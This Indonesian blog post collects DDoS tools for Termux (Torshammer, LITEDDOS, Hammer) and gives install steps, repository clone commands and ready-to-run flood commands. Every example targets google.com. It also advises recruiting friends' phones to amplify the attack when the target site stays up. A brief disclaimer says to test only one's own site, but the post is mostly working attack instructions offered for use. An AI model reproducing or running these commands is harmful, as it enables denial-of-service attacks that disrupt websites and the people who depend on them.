Kumpulan Script DDOS Termux Untuk Menguji Daya Tahan Website

Siapa yang tidak tahu DDOS itu apa? pasti 100% para pemilik website atau blog tahu akan hal itu, namun pernah gak sih kebayang kamu ingin mengetes seberapa kuatnya situs yang kamu miliki? saya juga sering bertanya-tanya apakah website saya akan down jika terkena serangan yang satu ini? Oleh karena itu saya telah mengumpulkan beberapa script ddos termux yang bisa kalian coba untuk menguji apakah situs kamu down atau tidak.

Namun perlu diingat sekali lagi, cara ini tidak boleh digunakan untuk situs orang lain sehingga merugikan dari segi apapun itu, karena serangan ini begitu berbahaya jika digunakan dan ditargetkan pada website yang menggunakan hosting karena bisa rawan suspend.

FYI: Saya menggunakan script yang masih berfungsi, jadi kumpulan kodenya akan sedikit namun untuk memudahkan kalian agar tidak pusing memilih script mana yang work karena sudah saya uji coba di blogspot dan situs web saya sendiri.

Oh iya apabila nanti tidak Bisa mengunduh Repositori (berkas tambahan) harap update termux ke versi yang terbaru, karena di versi yang baru sudah satu paket dengan Repositori.

Sebelum kecara-caranya harap install paket yang diperlukan, command line seperti dibawah ini dan wajib diinstal semua agar nanti kalian cukup copy-paste perintah intinya.

apt update && apt upgrade -y
pkg install git -y
pkg install python2 -y 
pkg install python -y 
pkg install clang -y
pkg install tor -y

Torshammer

Dilist pertama ada script hammer dan penggunaannya cukup mudah untuk diimplementasikan, silahkan salin perintahnya dibawah ini

git clone https://github.com/dotfighter/torshammer.git

Setelah itu untuk menjalankan scriptnya silahkan masukkan command line dibawah ini:

cd torshammer

python2 torshammer.py -t IP address -r 256

Ini contoh untuk menjalankan perintahnya python2 torshammer.py -t google.com -r 256

LITEDDOS

Sebelum saya lanjutkan tutorialnya, saya ingin memberi tahu terlebih dahulu bahwa setiap contoh script ddos bisa langsung kalian coba tanpa saya perlu deskripsikan langkahnya seperti apa.

git clone https://github.com/4L13199/LITEDDOS
cd LITEDDOS

python2 LITEDDOS.py google.com 80 100

Dilihat dari sumbernya yaitu gitub, script DDoS ini dibuat oleh orang itu Indonesia dan tidak tahu benar atau tidak, namun setelah saya coba emang ketika menjalankannya tool ini tiba tiba internet saya memakan speed hingga 5 Mbps.

Entah berhasil atau tidak, setidaknya kalian mencobanya.

Hammer

Untuk penginstalan script hammer silahkan ikuti langkah-langkahnya dibawah

git clone http://github.com/cyweb/hammer

Untuk menjalankan scriptnya silahkan masukan perintah dibawah ini

cd hammer

python hammer.py

python3 hammer.py -s google.com -p 80 -t 135

Baca: Cara Mengatasi DDoS + Gambar Setiap Langkah

Mengapa Website Nya Juga Belum Down?

Jika situs yang kamu serang masih bisa diakses, alangkah baiknya ajak temanmu atau menggunakan HP lain untuk membantu kinerja seberapa kuat website milik kamu apabila diserang DDoS.

Bagikan Artikel Ini Jika Bermanfaat
Default image
Prabowo Sakti

saya suka memberikan informasi yang kredibel atau bisa di percaya tentang seputar anime, tekno, internet, komik, game, tutorial Android maupun PC.

Articles: 204